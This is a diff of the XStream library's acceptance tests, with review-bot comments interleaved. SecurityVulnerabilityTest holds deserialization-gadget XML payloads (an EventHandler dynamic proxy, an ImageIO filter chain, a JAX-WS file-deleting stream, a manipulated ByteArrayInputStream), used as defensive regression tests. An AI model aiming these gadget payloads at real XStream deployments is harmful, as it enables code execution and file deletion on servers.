@@ -1,6 +1,6 @@ /* * Copyright (C) 2006 Joe Walnes. - * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019, 2020 XStream Committers. + * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019, 2020, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD
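Review bot: The `NameCoder` constructor's Javadoc says `Construct an Xpp3Driver.`, a copy-paste from the Xpp3 driver that names the wrong class. Change it to `* Construct an MXParserDriver.`; the `@since 1.4.16` on that constructor is already consistent with the class header.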
@@ -495,7 +495,7 @@ public class XmlFriendlyNameCoder implements NameCoder, Cloneable { for (; i < length; i++) { final char c = name.charAt(i); - if (c < 'A' || (c > 'Z' && c < 'a') || c > 'Z') { + if (c < 'A' || (c > 'Z' && c < 'a') || c > 'z') { break; } } diff --git a/xstream/src/java/com/thoughtworks/xstream/mapper/ImmutableTypesMapper.java b/xstream/src/java/com/thoughtworks/xstream/mapper/ImmutableTypesMapper.java index b21880716c90e3ae8ba040e9b91463bf62f3c190..1dcbd372313dae024e6f4796c2624a89e8ff10ad 100644 --- a/xstream/src/java/com/thoughtworks/xstream/mapper/ImmutableTypesMapper.java +++ b/xstream/src/java/com/thoughtworks/xstream/mapper/ImmutableTypesMapper.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2005 Joe Walnes. - * Copyright (C) 2006, 2007, 2009, 2015 XStream Committers. + * Copyright (C) 2006, 2007, 2009, 2015, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -66,8 +66,8 @@ public class ImmutableTypesMapper extends MapperWrapper { } public boolean isReferenceable(final Class type) { - if (unreferenceableTypes.contains(type)) { - return false; + if (immutableTypes.contains(type)) { + return !unreferenceableTypes.contains(type); } else { return super.isReferenceable(type); } diff --git a/xstream/src/test/com/thoughtworks/acceptance/AbstractAcceptanceTest.java b/xstream/src/test/com/thoughtworks/acceptance/AbstractAcceptanceTest.java index ee1114165e90384eba454b81d8081bbcc864f5af..7ac6f3a7a907621b8f734db4310a547a61f6e2b3 100644 --- a/xstream/src/test/com/thoughtworks/acceptance/AbstractAcceptanceTest.java +++ b/xstream/src/test/com/thoughtworks/acceptance/AbstractAcceptanceTest.java 
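Review bot: The corrected comparison chain is exactly the kind of expression in which the wrong bound went unnoticed, and nothing in the loop says what it scans for. A comment above the `if` makes the bounds checkable at a glance: `// stop at the first character that is not an ASCII letter (A-Z or a-z)`. The enclosing method starts before this hunk.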
@@ -1,6 +1,6 @@ /* * Copyright (C) 2003, 2004, 2005, 2006 Joe Walnes. - * Copyright (C) 2006, 2007, 2008, 2014, 2015 XStream Committers. + * Copyright (C) 2006, 2007, 2008, 2014, 2015, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -11,23 +11,15 @@ */ package com.thoughtworks.acceptance; -import java.lang.reflect.AccessibleObject; import java.lang.reflect.Array; -import java.net.URL; -import java.nio.charset.Charset; -import java.text.DecimalFormatSymbols; -import java.util.BitSet; -import java.util.Calendar; -import java.util.Collection; -import java.util.Currency; -import java.util.Date; -import java.util.Locale; -import java.util.Map; -import java.util.TimeZone; -import java.util.regex.Pattern; import java.io.ByteArrayOutputStream; import java.io.ByteArrayInputStream; -import java.io.File; +import java.io.IOException; +import java.io.InputStream; +import java.io.NotSerializableException; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.io.OutputStream; import java.io.StringReader; import java.io.StringWriter; @@ -45,11 +37,6 @@ import com.thoughtworks.xstream.io.HierarchicalStreamDriver; import com.thoughtworks.xstream.io.binary.BinaryStreamWriter; import com.thoughtworks.xstream.io.binary.BinaryStreamReader; import com.thoughtworks.xstream.io.xml.XppDriver; -import com.thoughtworks.xstream.security.ArrayTypePermission; -import com.thoughtworks.xstream.security.InterfaceTypePermission; -import com.thoughtworks.xstream.security.NoTypePermission; -import com.thoughtworks.xstream.security.NullPermission; -import com.thoughtworks.xstream.security.PrimitiveTypePermission; public abstract class AbstractAcceptanceTest extends TestCase { 
@@ -78,23 +65,6 @@ public abstract class AbstractAcceptanceTest extends TestCase { } protected void setupSecurity(XStream xstream) { - xstream.addPermission(NoTypePermission.NONE); // clear out defaults - xstream.addPermission(NullPermission.NULL); - xstream.addPermission(ArrayTypePermission.ARRAYS); - xstream.addPermission(InterfaceTypePermission.INTERFACES); - xstream.addPermission(PrimitiveTypePermission.PRIMITIVES); - xstream.allowTypeHierarchy(AccessibleObject.class); - xstream.allowTypeHierarchy(Calendar.class); - xstream.allowTypeHierarchy(Collection.class); - xstream.allowTypeHierarchy(Map.class); - xstream.allowTypeHierarchy(Map.Entry.class); - xstream.allowTypeHierarchy(Number.class); - xstream.allowTypeHierarchy(TimeZone.class); - xstream.allowTypeHierarchy(Throwable.class); - xstream.allowTypes(new Class[]{ - BitSet.class, Charset.class, Class.class, Currency.class, Date.class, DecimalFormatSymbols.class, - File.class, Locale.class, Object.class, Pattern.class, StackTraceElement.class, String.class, - StringBuffer.class, URL.class}); xstream.allowTypesByWildcard(new String[]{ AbstractAcceptanceTest.class.getPackage().getName()+".*objects.**", this.getClass().getName()+"$*" @@ -110,8 +80,7 @@ public abstract class AbstractAcceptanceTest extends TestCase { assertEquals( normalizedXML(xml, new String[]{match}, templateSelect, sortSelect), resultXml); - // Now deserialize the XML back into the object and check it equals the original - // object. + // Now deserialize the XML back into the object and check it equals the original object. Object resultRoot = xstream.fromXML(resultXml); assertObjectsEqual(root, resultRoot); 
@@ -162,6 +131,58 @@ public abstract class AbstractAcceptanceTest extends TestCase { return resultRoot; } + protected static void serialize(final Object object, final OutputStream outputStream) { + try { + ObjectOutputStream out = new ObjectOutputStream(outputStream); + out.writeObject(object); + out.close(); + } catch (final NotSerializableException e) { + fail("Serialization of object of type " + + object.getClass().getName() + + " failed because of reference to type " + + e.getMessage(), e); + } catch (final IOException e) { + fail("Serialization of object of type " + object.getClass().getName() + " failed", e); + } + } + + protected static Object deserialize(final InputStream inputStream) { + try { + ObjectInputStream out = new ObjectInputStream(inputStream); + final Object t = out.readObject(); + out.close(); + return t; + } catch (final ClassNotFoundException e) { + fail("Cannot find class " + e.getMessage() + " during deserialization", e); + throw new AssertionFailedError(); // never reached + } catch (final IOException e) { + fail("Deserialization failed reading the InputStream", e); + throw new AssertionFailedError(); // never reached + } + } + + protected Object assertJavaSerialization(final Object in) { + byte[] data; + try { + ByteArrayOutputStream os = new ByteArrayOutputStream(); + serialize(in, os); + data = os.toByteArray(); + os.close(); + } catch (final IOException e) { + fail("Serialization failed closing the OutputStream", e); + throw new AssertionFailedError(); // never reached + } + try { + InputStream is = new ByteArrayInputStream(data); + Object t = deserialize(is); + is.close(); + return t; + } catch (final IOException e) { + fail("Deserialization failed closing the InputStream", e); + throw new AssertionFailedError(); // never reached + } + } + /** * Allow derived classes to decide how to turn the object into XML text */ 
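Review bot: In `deserialize` the `ObjectInputStream` is named `out`, which reads as the writer side of the pair; rename it `in`. Neither helper closes its stream when `writeObject`/`readObject` throws, because `close()` sits inside the `try` rather than a `finally`; that is harmless for the `ByteArray*` streams `assertJavaSerialization` passes, but the helpers are `protected static` and accept arbitrary streams. A `finally { in.close(); }` (declaring the stream before the `try`) is enough here, since the file appears to stay on pre-Java-7 syntax.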
@@ -254,4 +275,10 @@ public abstract class AbstractAcceptanceTest extends TestCase { .transform(new StreamSource(new StringReader(xml)), new StreamResult(writer)); return writer.toString(); } + + protected static void fail(final String message, final Throwable cause) { + final AssertionFailedError err = new AssertionFailedError(message); + err.initCause(cause); + throw err; + } } diff --git a/xstream/src/test/com/thoughtworks/acceptance/AbstractReferenceTest.java b/xstream/src/test/com/thoughtworks/acceptance/AbstractReferenceTest.java index 07664a4da461b6d865fb8017620416294f3bc05a..d27b841d3d17c208377695e91a5be6b99125138a 100644 --- a/xstream/src/test/com/thoughtworks/acceptance/AbstractReferenceTest.java +++ b/xstream/src/test/com/thoughtworks/acceptance/AbstractReferenceTest.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2004, 2005 Joe Walnes. - * Copyright (C) 2006, 2007, 2009, 2010, 2011, 2014, 2015 XStream Committers. + * Copyright (C) 2006, 2007, 2009, 2010, 2011, 2014, 2015, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -23,7 +23,9 @@ import java.util.List; import com.thoughtworks.acceptance.objects.StandardObject; import com.thoughtworks.acceptance.someobjects.WithNamedList; import com.thoughtworks.xstream.converters.ConversionException; +import com.thoughtworks.xstream.converters.basic.AbstractSingleValueConverter; import com.thoughtworks.xstream.core.AbstractReferenceMarshaller; +import com.thoughtworks.xstream.core.JVM; public abstract class AbstractReferenceTest extends AbstractAcceptanceTest { 
@@ -526,7 +528,57 @@ public abstract class AbstractReferenceTest extends AbstractAcceptanceTest { Thing t1 = (Thing)result.get(1); Thing t2 = (Thing)result.get(2); - assertEquals(t0, t1); assertSame(t0, t1); + assertNotSame(t0, t2); + assertEquals(t0, t2); + } + + private static class ThingConverter extends AbstractSingleValueConverter { + + public boolean canConvert(Class type) { + return type == Thing.class; + } + + public Object fromString(String str) { + throw new UnsupportedOperationException(); + } + + public String toString(Object obj) { + return ((Thing)obj).field; + } + } + + public void testImmutableEnumInstancesCanBeDereferenced() { + + if (JVM.is15()) { + Thing green = new Thing("GREEN"); + List list = new ArrayList(); + list.add(green); + list.add(green); + + xstream.allowTypes(new String[]{"com.thoughtworks.xstream.converters.enums.SimpleEnum"}); + xstream.alias("simple", Thing.class); + xstream.registerConverter(new ThingConverter()); + String xml = xstream.toXML(list); + + Class enumType = JVM.loadClassForName("com.thoughtworks.xstream.converters.enums.SimpleEnum"); + xstream.alias("simple", enumType); + + try { + xstream.fromXML(xml); + fail("Thrown " + ConversionException.class.getName() + " expected"); + } catch (final ConversionException e) { + assertEquals(enumType.getName(), e.get("referenced-type")); + } + + xstream.addImmutableType(enumType, true); + + List result = (List)xstream.fromXML(xml); + + Object t0 = result.get(0); + Object t1 = result.get(1); + + assertSame(t0, t1); + } } } diff --git a/xstream/src/test/com/thoughtworks/acceptance/CustomSerializationTest.java b/xstream/src/test/com/thoughtworks/acceptance/CustomSerializationTest.java index 34cecf15a2ca903dd0b91b7732af356a486abbde..ba0e22d782d2afc2e0184271373b33a9d4dd8f7e 100644 --- a/xstream/src/test/com/thoughtworks/acceptance/CustomSerializationTest.java +++ b/xstream/src/test/com/thoughtworks/acceptance/CustomSerializationTest.java 
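Review bot: testImmutableEnumInstancesCanBeDereferenced guards on `JVM.is15()` while the other new tests in this commit (ReadResolveTest, SecurityVulnerabilityTest) use `JVM.isVersion(5)`; one form for all version checks keeps them easy to grep, so `if (JVM.isVersion(5)) {` here. The closing assertions only prove that both list entries are the same instance; nothing checks that the reference actually resolved to the `GREEN` constant the `ThingConverter` wrote. Adding `assertEquals("GREEN", String.valueOf(t0));` after `assertSame(t0, t1)` would pin that, assuming SimpleEnum does not override toString — not visible here.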
@@ -1,6 +1,6 @@ /* * Copyright (C) 2004, 2005 Joe Walnes. - * Copyright (C) 2006, 2007, 2015 XStream Committers. + * Copyright (C) 2006, 2007, 2015, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -21,6 +21,13 @@ import java.io.ObjectOutputStream; import java.io.ObjectStreamField; import java.io.Serializable; +import com.thoughtworks.acceptance.objects.Hardware; +import com.thoughtworks.acceptance.objects.Software; +import com.thoughtworks.acceptance.objects.StandardObject; +import com.thoughtworks.xstream.XStream; +import com.thoughtworks.xstream.converters.reflection.PureJavaReflectionProvider; + + public class CustomSerializationTest extends AbstractAcceptanceTest { public static class ObjectWithCustomSerialization extends StandardObject implements Serializable { 
@@ -201,6 +208,59 @@ public class CustomSerializationTest extends AbstractAcceptanceTest { assertBothWays(child, expectedXml); } + static class Pair { + protected Object first; + protected Object second; + + protected Pair() { + } + + public Pair(final Object first, final Object second) { + this.first = first; + this.second = second; + } + } + + static class SerializablePair extends Pair implements Serializable { + private static final long serialVersionUID = 20201214L; + + public SerializablePair(final Object first, final Object second) { + super(first, second); + } + + private void writeObject(final ObjectOutputStream out) throws IOException { + out.writeObject(first); + out.writeObject(second); + } + + private void readObject(final ObjectInputStream in) throws IOException, ClassNotFoundException { + first = in.readObject(); + second = in.readObject(); + } + } + + public void testCustomSerializationWithoutDefaultReadAndWriteObject() { + xstream = new XStream(new PureJavaReflectionProvider()); + setupSecurity(xstream); + xstream.alias("pair", Pair.class); + xstream.alias("serpair", SerializablePair.class); + + final String expectedXml = "" + + "<serpair serialization=\"custom\">\n" + + " <unserializable-parents>\n" + + " <first class=\"int\">42</first>\n" + + " <second class=\"string\">fourty-two</second>\n" + + " </unserializable-parents>\n" + + " <serpair>\n" + + " <int>42</int>\n" + + " <string>fourty-two</string>\n" + + " </serpair>\n" + + "</serpair>"; + + final Pair pair = (Pair)new SerializablePair(new Integer(42), "fourty-two"); + assertBothWays(pair, expectedXml.replace('\'', '"')); + } + static class MyDate extends java.util.Date { public MyDate(int time) { super(time); diff --git a/xstream/src/test/com/thoughtworks/acceptance/EncodingTestSuite.java b/xstream/src/test/com/thoughtworks/acceptance/EncodingTestSuite.java index 38f13364b08a9f172c83fb2d62289e78293c18be..62f419b2e492abf2477298b6002feb506bfb7d7b 100644 
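Review bot: `expectedXml.replace('\'', '"')` in testCustomSerializationWithoutDefaultReadAndWriteObject is a no-op: the literal already uses escaped double quotes and contains no single quote, so the call only suggests a quoting convention that is not being used. Either write the fixture with single quotes as the sibling tests in this commit do (`"<serpair serialization='custom'>\n"` and so on) and keep the replace, or drop the call and pass `expectedXml` directly. The empty `protected Pair()` constructor is what lets PureJavaReflectionProvider instantiate the unserializable parent; a comment saying so, `// no-arg ctor required by PureJavaReflectionProvider`, would stop someone from removing it as unused.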
--- a/xstream/src/test/com/thoughtworks/acceptance/EncodingTestSuite.java +++ b/xstream/src/test/com/thoughtworks/acceptance/EncodingTestSuite.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2006 Joe Walnes. - * Copyright (C) 2006, 2007, 2008, 2016, 2017 XStream Committers. + * Copyright (C) 2006, 2007, 2008, 2016, 2017, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -100,7 +100,6 @@ public class EncodingTestSuite extends TestSuite { + "</test>"; final XStream xstream = new XStream(driver); - XStream.setupDefaultSecurity(xstream); xstream.allowTypesByWildcard(new String[] {getClass().getName()+"$*"}); xstream.alias("test", TestObject.class); final TestObject obj = new TestObject(); diff --git a/xstream/src/test/com/thoughtworks/acceptance/MultipleObjectsInOneStreamTest.java b/xstream/src/test/com/thoughtworks/acceptance/MultipleObjectsInOneStreamTest.java index 99995f1fbcd1f88b5d57530aff958f28774f2328..557e7923db6e04859d7d186f1863ae3d5393a107 100644 --- a/xstream/src/test/com/thoughtworks/acceptance/MultipleObjectsInOneStreamTest.java +++ b/xstream/src/test/com/thoughtworks/acceptance/MultipleObjectsInOneStreamTest.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2005, 2006 Joe Walnes. - * Copyright (C) 2006, 2007, 2008, 2009, 2018 XStream Committers. + * Copyright (C) 2006, 2007, 2008, 2009, 2018, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD 
@@ -22,8 +22,8 @@ import com.thoughtworks.xstream.core.ReferenceByIdUnmarshaller; import com.thoughtworks.xstream.io.HierarchicalStreamReader; import com.thoughtworks.xstream.io.HierarchicalStreamWriter; import com.thoughtworks.xstream.io.ReaderWrapper; +import com.thoughtworks.xstream.io.xml.MXParserDriver; import com.thoughtworks.xstream.io.xml.PrettyPrintWriter; -import com.thoughtworks.xstream.io.xml.Xpp3Driver; import com.thoughtworks.xstream.io.xml.XppReader; import com.thoughtworks.xstream.mapper.Mapper; import com.thoughtworks.xstream.testutil.CallLog; @@ -216,7 +216,7 @@ public class MultipleObjectsInOneStreamTest extends AbstractAcceptanceTest { + " <string>bottom</string>\n" + "</object-stream>"; - final LevelTrackingReader reader = new LevelTrackingReader(new Xpp3Driver().createReader(new StringReader(xml))); + final LevelTrackingReader reader = new LevelTrackingReader(new MXParserDriver().createReader(new StringReader(xml))); final ObjectInputStream ois = xstream.createObjectInputStream(reader); final int level = reader.getLevel(); assertEquals("top", ois.readObject()); diff --git a/xstream/src/test/com/thoughtworks/acceptance/ReadResolveTest.java b/xstream/src/test/com/thoughtworks/acceptance/ReadResolveTest.java index f8c52133510f187211386e3e3c1c062f615d800b..14fd9b02ead3c65b9aef8169d6a74f1a4c2da6dd 100644 --- a/xstream/src/test/com/thoughtworks/acceptance/ReadResolveTest.java +++ b/xstream/src/test/com/thoughtworks/acceptance/ReadResolveTest.java @@ -1,6 +1,6 @@ /* * Copyright (C) 2004, 2005 Joe Walnes. - * Copyright (C) 2006, 2007 XStream Committers. + * Copyright (C) 2006, 2007, 2014, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD 
@@ -18,6 +18,10 @@ import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; +import java.io.Serializable; + +import com.thoughtworks.xstream.converters.ConversionException; +import com.thoughtworks.xstream.core.JVM; /** * @author Chris Kelly @@ -52,4 +56,56 @@ public class ReadResolveTest extends AbstractAcceptanceTest { assertSame(status, rStatus); } + + public static class ResolveToNull implements Serializable { + private static final long serialVersionUID = 201412L; + final String name; + + public ResolveToNull(final String name) { + this.name = name; + } + + private Object readResolve() { + return null; + } + } + + public void testResolveToNull() throws IOException, ClassNotFoundException { + final ResolveToNull obj = new ResolveToNull("test"); + + final ByteArrayOutputStream bout = new ByteArrayOutputStream(); + final ObjectOutputStream os = new ObjectOutputStream(bout); + os.writeObject(obj); + + final byte[] bArray = bout.toByteArray(); + ObjectInputStream in = null; + final ByteArrayInputStream bin = new ByteArrayInputStream(bArray); + in = new ObjectInputStream(bin); + assertNull(in.readObject()); + + xstream.alias("toNull", ResolveToNull.class); + assertNull(xstream.fromXML("<toNull><name>test</name></toNull>")); + } + + public void testOutOfMemoryInReadObject() { + if (JVM.isVersion(5)) { + final String xml = "" + + "<java.util.PriorityQueue serialization='custom'>\n" + + " <unserializable-parents/>\n" + + " <java.util.PriorityQueue>\n" + + " <default>\n" + + " <size>2147483647</size>\n" + + " </default>\n" + + " <int>2</int>\n" + + " </java.util.PriorityQueue>\n" + + "</java.util.PriorityQueue>"; + + try { + xstream.fromXML(xml); + fail("Thrown " + ConversionException.class.getName() + " expected"); + } catch (final ConversionException e) { + // OK + } + } + } } 
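Review bot: The catch in testOutOfMemoryInReadObject accepts any ConversionException with a bare `// OK`, so a rejection unrelated to the oversized `<size>` (a malformed custom-serialization stream, for instance) would pass the test just as well; asserting on the exception's context, for example that `e.get("class")` names `java.util.PriorityQueue` or that the message mentions the field, would pin the intended rejection — the exact keys the converter sets are not visible here. In testResolveToNull, `ObjectInputStream in = null;` is reassigned on the next statement and can simply be `final ObjectInputStream in = new ObjectInputStream(bin);`, and `os.close();` after `writeObject` would mirror the serialize helper added to AbstractAcceptanceTest in this commit.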
diff --git a/xstream/src/test/com/thoughtworks/acceptance/SecurityManagerTest.java b/xstream/src/test/com/thoughtworks/acceptance/SecurityManagerTest.java index 2e6631334b539828bdec6380c5226351bdb2edec..f9b878aeff7a4a5121ec0f6d87576ee4d8eaf9e3 100644 --- a/xstream/src/test/com/thoughtworks/acceptance/SecurityManagerTest.java +++ b/xstream/src/test/com/thoughtworks/acceptance/SecurityManagerTest.java @@ -205,7 +205,6 @@ public class SecurityManagerTest extends TestCase { } private void assertBothWays() { - XStream.setupDefaultSecurity(xstream); xstream.allowTypesByWildcard(new String[] {"com.thoughtworks.acceptance.objects.*"}); xstream.alias("software", Software.class); diff --git a/xstream/src/test/com/thoughtworks/acceptance/SecurityVulnerabilityTest.java b/xstream/src/test/com/thoughtworks/acceptance/SecurityVulnerabilityTest.java index da5f861ef08e6aa7689f810df74fc8e7726d3c62..09b96a8d011a2d26365da856654953b5146e6533 100644 --- a/xstream/src/test/com/thoughtworks/acceptance/SecurityVulnerabilityTest.java +++ b/xstream/src/test/com/thoughtworks/acceptance/SecurityVulnerabilityTest.java @@ -1,5 +1,5 @@ /* - * Copyright (C) 2013, 2014, 2017, 2018, 2020 XStream Committers. + * Copyright (C) 2013, 2014, 2017, 2018, 2020, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -11,6 +11,7 @@ package com.thoughtworks.acceptance; import java.beans.EventHandler; +import java.io.ByteArrayInputStream; import java.io.File; import java.io.FileOutputStream; import java.io.IOException; 
@@ -18,12 +19,12 @@ import java.io.InputStream; import java.io.OutputStream; import java.util.Iterator; -import com.thoughtworks.xstream.XStream; import com.thoughtworks.xstream.XStreamException; import com.thoughtworks.xstream.converters.ConversionException; import com.thoughtworks.xstream.core.JVM; import com.thoughtworks.xstream.security.AnyTypePermission; import com.thoughtworks.xstream.security.ForbiddenClassException; +import com.thoughtworks.xstream.security.ProxyTypePermission; /** @@ -37,9 +38,8 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest { super.setUp(); BUFFER.setLength(0); xstream.alias("runnable", Runnable.class); - } - - protected void setupSecurity(XStream xstream) { + xstream.allowTypeHierarchy(Runnable.class); + xstream.addPermission(ProxyTypePermission.PROXIES); } public void testCannotInjectEventHandler() { @@ -63,28 +63,6 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest { assertEquals(0, BUFFER.length()); } - public void testCannotInjectEventHandlerWithUnconfiguredSecurityFramework() { - xstream.alias("runnable", Runnable.class); - final String xml = "" - + "<string class='runnable-array'>\n" - + " <dynamic-proxy>\n" - + " <interface>java.lang.Runnable</interface>\n" - + " <handler class='java.beans.EventHandler'>\n" - + " <target class='com.thoughtworks.acceptance.SecurityVulnerabilityTest$Exec'/>\n" - + " <action>exec</action>\n" - + " </handler>\n" - + " </dynamic-proxy>\n" - + "</string>"; - - try { - xstream.fromXML(xml); - fail("Thrown " + XStreamException.class.getName() + " expected"); - } catch (final XStreamException e) { - assertTrue(e.getMessage().indexOf(EventHandler.class.getName()) >= 0); - } - assertEquals(0, BUFFER.length()); - } - public void testExplicitlyConvertEventHandler() { final String xml = "" + "<string class='runnable-array'>\n" 
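Review bot: Deleting testCannotInjectEventHandlerWithUnconfiguredSecurityFramework together with the empty `setupSecurity` override means this class no longer exercises an XStream instance that received no explicit allow list; the remaining tests run with `allowTypeHierarchy(Runnable.class)` and `ProxyTypePermission.PROXIES` already granted in setUp. If the framework is now configured by the constructor itself (the `setupDefaultSecurity` removals elsewhere in this commit suggest so, but it is not visible here), a test that builds a plain `new XStream()`, feeds it the EventHandler payload and expects a ForbiddenClassException would keep that guarantee covered. A short comment in setUp, `// permissions below are what the remaining positive tests need; negative tests rely on XStream's own defaults`, would also explain why proxies are allowed for the whole class.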
@@ -105,39 +83,6 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest { assertEquals("Executed!", BUFFER.toString()); } - public void testCannotInjectConvertImageIOContainsFilterWithUnconfiguredSecurityFramework() { - if (JVM.isVersion(7)) { - final String xml = "" - + "<string class='javax.imageio.spi.FilterIterator'>\n" - + " <iter class='java.util.ArrayList$Itr'>\n" - + " <cursor>0</cursor>\n" - + " <lastRet>1</lastRet>\n" - + " <expectedModCount>1</expectedModCount>\n" - + " <outer-class>\n" - + " <com.thoughtworks.acceptance.SecurityVulnerabilityTest_-Exec/>\n" - + " </outer-class>\n" - + " </iter>\n" - + " <filter class='javax.imageio.ImageIO$ContainsFilter'>\n" - + " <method>\n" - + " <class>com.thoughtworks.acceptance.SecurityVulnerabilityTest$Exec</class>\n" - + " <name>exec</name>\n" - + " <parameter-types/>\n" - + " </method>\n" - + " <name>exec</name>\n" - + " </filter>\n" - + " <next/>\n" - + "</string>"; - - try { - xstream.fromXML(xml); - fail("Thrown " + XStreamException.class.getName() + " expected"); - } catch (final XStreamException e) { - assertTrue(e.getMessage().indexOf("javax.imageio.ImageIO$ContainsFilter") >= 0); - } - assertEquals(0, BUFFER.length()); - } - } - public void testExplicitlyConvertImageIOContainsFilter() { if (JVM.isVersion(7)) { final String xml = "" @@ -162,6 +107,7 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest { + "</string>"; xstream.allowTypes(new String[]{"javax.imageio.ImageIO$ContainsFilter"}); + xstream.allowTypeHierarchy(Iterator.class); final Iterator iterator = (Iterator)xstream.fromXML(xml); assertEquals(0, BUFFER.length()); @@ -181,8 +127,8 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest { try { xstream.fromXML("<void/>"); fail("Thrown " + ConversionException.class.getName() + " expected"); - } catch (final ConversionException e) { - assertEquals("void", e.get("construction-type")); + } catch (final ForbiddenClassException e) { + // OK } } 
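Review bot: In the `<void/>` test the catch now expects ForbiddenClassException, but the unchanged `fail("Thrown " + ConversionException.class.getName() + " expected")` just before it still names ConversionException, so an unexpected success would report the wrong expected type; change it to `fail("Thrown " + ForbiddenClassException.class.getName() + " expected");`. The `// OK` body could also pin what was forbidden, e.g. `assertEquals("void", e.getMessage());`, which matches how the ByteArrayInputStream test added further down in this file reads the forbidden type from the message.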
@@ -207,23 +153,11 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest { } } - public static class LazyIterator {} - - public void testInstanceOfLazyIterator() { - xstream.alias("lazy-iterator", LazyIterator.class); - try { - xstream.fromXML("<lazy-iterator/>"); - fail("Thrown " + ForbiddenClassException.class.getName() + " expected"); - } catch (final ForbiddenClassException e) { - // OK - } - } - public void testCannotUseJaxwsInputStreamToDeleteFile() { if (JVM.isVersion(5)) { final String xml = "" + "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n" - + " <tempFile>target/junit/test.txt</tempFile>\n" + + " <tempFile>target/junit/test.txt</tempFile>\n" + "</is>"; xstream.aliasType("is", InputStream.class); @@ -252,7 +186,7 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest { final String xml = "" + "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n" - + " <tempFile>target/junit/test.txt</tempFile>\n" + + " <tempFile>target/junit/test.txt</tempFile>\n" + "</is>"; xstream.addPermission(AnyTypePermission.ANY); // clear out defaults 
@@ -282,4 +216,49 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest { } } } + + public void testCannotInjectManipulatedByteArryInputStream() { + xstream.alias("bais", ByteArrayInputStream.class); + final String xml = "" + + "<bais>\n" + + " <buf></buf>\n" + + " <pos>-2147483648</pos>\n" + + " <mark>0</mark>\n" + + " <count>0</count>\n" + + "</bais>"; + + try { + xstream.fromXML(xml); + fail("Thrown " + ForbiddenClassException.class.getName() + " expected"); + } catch (final ForbiddenClassException e) { + assertEquals(e.getMessage(),ByteArrayInputStream.class.getName()); + } + } + + public void testExplicitlyUnmarshalEndlessByteArryInputStream() { + xstream.alias("bais", ByteArrayInputStream.class); + xstream.allowTypes(new Class[]{ByteArrayInputStream.class}); + + final String xml = "" + + "<bais>\n" + + " <buf></buf>\n" + + " <pos>-2147483648</pos>\n" + + " <mark>0</mark>\n" + + " <count>0</count>\n" + + "</bais>"; + + final byte[] data = new byte[10]; + final ByteArrayInputStream bais = (ByteArrayInputStream)xstream.fromXML(xml); + int i = 5; + try { + while(bais.read(data, 0, 10) == 0) { + if (--i == 0) { + break; + } + } + assertEquals("Unlimited reads of ByteArrayInputStream returning 0 bytes expected", 0, i); + } catch(ArrayIndexOutOfBoundsException e) { + assertEquals("ArrayIndexOutOfBoundsException expected reading invalid stream", 5, i); + } + } } diff --git a/xstream/src/test/com/thoughtworks/acceptance/SerializationCallbackOrderTest.java b/xstream/src/test/com/thoughtworks/acceptance/SerializationCallbackOrderTest.java index c8db4cdcfb0d7e930c22271f4ef07f23a676b280..4e229d94f9640d531c6ccde2fe180fa89f74b569 100644 --- a/xstream/src/test/com/thoughtworks/acceptance/SerializationCallbackOrderTest.java +++ b/xstream/src/test/com/thoughtworks/acceptance/SerializationCallbackOrderTest.java 
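Review bot: `assertEquals(e.getMessage(), ByteArrayInputStream.class.getName())` in testCannotInjectManipulatedByteArryInputStream passes actual before expected, so a failure would print the values swapped; `assertEquals(ByteArrayInputStream.class.getName(), e.getMessage());` follows the expected/actual order used elsewhere in the class. Both new method names misspell ByteArray as `ByteArry`. In the second test the loop bound of 5 and the two assertions encode two possible JDK behaviours (read returning 0 indefinitely versus throwing ArrayIndexOutOfBoundsException) without saying so; a comment above the loop such as `// pos=Integer.MIN_VALUE makes count-pos overflow in read(): some JDKs return 0 forever, others throw` would explain why both outcomes are accepted — the exact JDK split is inferred, not visible here.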
@@ -1,6 +1,6 @@ /* * Copyright (C) 2005 Joe Walnes. - * Copyright (C) 2006, 2007, 2014 XStream Committers. + * Copyright (C) 2006, 2007, 2014, 2021 XStream Committers. * All rights reserved. * * The software in this package is published under the terms of the BSD @@ -11,6 +11,8 @@ */ package com.thoughtworks.acceptance; +import com.thoughtworks.xstream.converters.reflection.PureJavaReflectionProvider; +import com.thoughtworks.xstream.converters.reflection.SerializableConverter; import com.thoughtworks.xstream.testutil.CallLog; import java.io.ByteArrayInputStream; 
